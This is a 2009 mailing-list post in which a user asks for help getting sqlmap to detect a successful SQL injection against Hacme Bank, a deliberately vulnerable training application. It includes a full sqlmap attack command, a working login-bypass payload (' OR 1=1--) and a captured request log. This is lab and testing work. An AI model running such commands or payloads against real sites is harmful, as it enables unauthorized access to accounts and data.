[sqlmap-users] sqlmap and Hacme Bank
Brought to you by:
inquisb
From: Richard J. <wp...@gm...> - 2009-06-23 20:02:31
|
Hi all, I've been playing with sqlmap against Foundstone's Hacme Bank and have been making some progress. Here is the command I've come up with: ./sqlmap.py -u "http://192.168.200.11/HacmeBank_v2_Website/aspx/login.aspx" --method=POST -p "txtUserName" --cookie="ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5; Admin=false" --data="__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit" -v 5 --prefix="'" --postfix=" OR 1=1--" --batch I can confirm that this command is able to gain access to the HacmeBank site with this crafted string: jv' AND 1322=1322 OR 1=1-- (Unicode decoded, of course). Some other crafted strings from sqlmap are successful as well. BUT, sqlmap doesn't seem to detect that it is successful in gaining access. I think the problem exists in the --regexp string.....as in I can't find a regexp that works.... >From the sqlmap docs, --regexp lets the user "provide a string which is * always* present on the not injected page *and* on all True injected query pages, but that it is *not* on the False ones". The problem I think am I running into is finding a string that is present on the not injected page, but no on the false pages. The strings that I have been trying to match are: Not Injected Page: Message"></span> True Injected Page: Message">Line 1: Incorrect syntax near 'asdf'.</span> False Injected Page: Message">Invalid Login</span> My question is how is the "not injected" page detected? When watching the output on level 5 verbosity, I see this request. I assume this is the request to determine the "Not Injected" page? [11:42:28] [INFO] testing if the provided regular expression matches within the target URL page content [11:42:30] [TRAFFIC OUT] HTTP request: POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1 Content-length: 105 Accept-language: en-us,en;q=0.5 Connection: Keep-Alive Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 192.168.200.11:80 <http://192.168.200.11/> Cookie: ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5; Admin=false Content-type: application/x-www-form-urlencoded __VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit This request sends in the POST data that I provided at the command line. This data causes an "Invalid Login" from the login page, which is exactly what happens when a False injected query occurs as well. In fact, the HTML that comes back from this "Not Injected" request is identical to the HTML that comes back from a False injected page. So, in this situation, I feel that sqlmap isn't requesting the "Not Injected" page correctly. In my mind, that would involve a GET request, with no login data, to login.aspx, not a POST to that page. The GET should return a page that doesn't have the "Invalid Login" text that gets returned to a POST with invalid credentials. So, can I get sqlmap to detect the "Not Injected" page with a simple GET request, but then perform the sql injection using POST requests? Or is there something else that needs done? I tried changing --method to GET, as well as removing --method, but the GET that is sent for the "Not Injected" page still contains the POST data, which still results in "Invalid Login". Or I am confused on how this should work? Thanks! Richard |